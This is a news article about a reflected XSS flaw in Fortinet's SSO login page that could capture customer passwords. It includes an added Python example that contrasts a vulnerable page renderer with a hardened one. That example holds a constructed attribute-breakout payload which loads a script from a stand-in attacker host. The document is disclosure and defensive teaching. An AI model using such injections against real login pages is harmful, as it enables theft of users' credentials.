Just the bug nation-state actors were looking for

Mar 4, 2016 13:11 GMT  ·  By

The Fortinet login page used by the company's customers was vulnerable to a reflected cross-site scripting (RXSS) attack that allowed attackers to capture customers' passwords in cleartext.

Fortinet is a US cyber-security vendor, one of the biggest suppliers of security products and services, right up there with Cisco, Check Point, and Juniper in terms of size and reputation.

Fortinet login page contained a reflected XSS

According to French security researcher Yann Cam, working for information security firm Synetis, Fortinet's SSO (Single Sign-On) login system contained a vulnerability that allowed attackers to insert malicious parameters into the login page's URL.

Since Fortinet redirects users who access other services to the login.fortinet.com domain using extremely long and complicated URLs, an attacker would find it easy to hide malicious code inside one of them.

In his tests, Mr. Cam created a malicious JS file, hosted it on his own server, and used the XSS to load it alongside the rest of the legitimate Fortinet login page.

This malicious file altered code in the original Fortinet login page, allowing the attacker to hijack the login form and send the entered credentials to one of his servers, where they were logged.
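The pattern the article describes, shown as an added example that is not Fortinet's code or the researcher's proof of concept: a hypothetical login page that reflects a `next` redirect parameter into its HTML, in its vulnerable form beside a hardened form that allow-lists the redirect host, HTML-escapes the value, and sends a Content-Security-Policy so that a script from a foreign origin will not run even if markup slips through. Host names and the payload are constructed.

```python
import html
from urllib.parse import urlparse

# Hypothetical allow-list of hosts the SSO page may redirect back to.
ALLOWED_REDIRECT_HOSTS = {"support.example.com", "portal.example.com"}

# Minimal login form that carries the redirect target in a hidden field.
TEMPLATE = (
    '<form action="/sso/login" method="post">'
    '<input type="hidden" name="next" value="{next}">'
    '<input name="user"><input name="pass" type="password"></form>'
)


def render_vulnerable(next_url: str) -> str:
    """Reflects the parameter verbatim: a double quote in the input closes
    the value attribute and everything after it is parsed as markup."""
    return TEMPLATE.format(next=next_url)


def safe_redirect(next_url: str) -> str:
    """Accept only https targets on allow-listed hosts; otherwise fall back
    to the site root so an attacker cannot choose the post-login destination."""
    parsed = urlparse(next_url)
    if parsed.scheme == "https" and parsed.hostname in ALLOWED_REDIRECT_HOSTS:
        return next_url
    return "/"


def render_hardened(next_url: str):
    """Validate, then HTML-escape (quotes included) so the value can never
    break out of the attribute, and add a CSP that forbids scripts and form
    submissions to any origin but our own. Returns (body, headers)."""
    value = html.escape(safe_redirect(next_url), quote=True)
    body = TEMPLATE.format(next=value)
    headers = {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; form-action 'self'"
    }
    return body, headers


# Constructed payload in the shape the article describes: break out of the
# attribute and pull a script from an attacker-controlled host.
PAYLOAD = '"><script src="https://attacker.invalid/x.js"></script>'


def demo():
    """Returns whether a <script> tag survives in each rendering."""
    vulnerable_body = render_vulnerable(PAYLOAD)
    hardened_body, _ = render_hardened(PAYLOAD)
    return "<script" in vulnerable_body, "<script" in hardened_body
```

The hardened renderer neutralises the injection twice over: the allow-list drops the foreign target entirely, and escaping keeps even an allow-listed URL containing quotes inside the attribute.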

No need for phishing pages, the XSS was more than enough

"In this case, the RXSS is located directly on the centralized authentication page. Thus, no need to create a fake login page to deceive potential victims," Mr. Cam explains.

An attacker using this exploit could access a Fortinet customer's account and see what kind of security equipment they bought, gaining crucial information needed to plan future attacks.

If the customer had reused the Fortinet username/password on other sites or even security devices, then the attacker would have had a simple key to many of the victim's assets.

Mr. Cam discovered the issue on November 6, 2015, and Fortinet patched it on December 2, 2015. The reason details about this bug are only now coming to light is that Mr. Cam also identified a second XSS in Fortinet's ticketing software and waited for Fortinet to patch that one as well. Fortinet does not run a bug bounty program, so there was no additional monetary reward for Mr. Cam's work.

The proof-of-concept video that Mr. Cam provided Fortinet can be viewed below. Softpedia has also contacted Fortinet for an official response regarding this issue, and inquired about suspicious logins during the past year, along with the type of data an attacker could have accessed.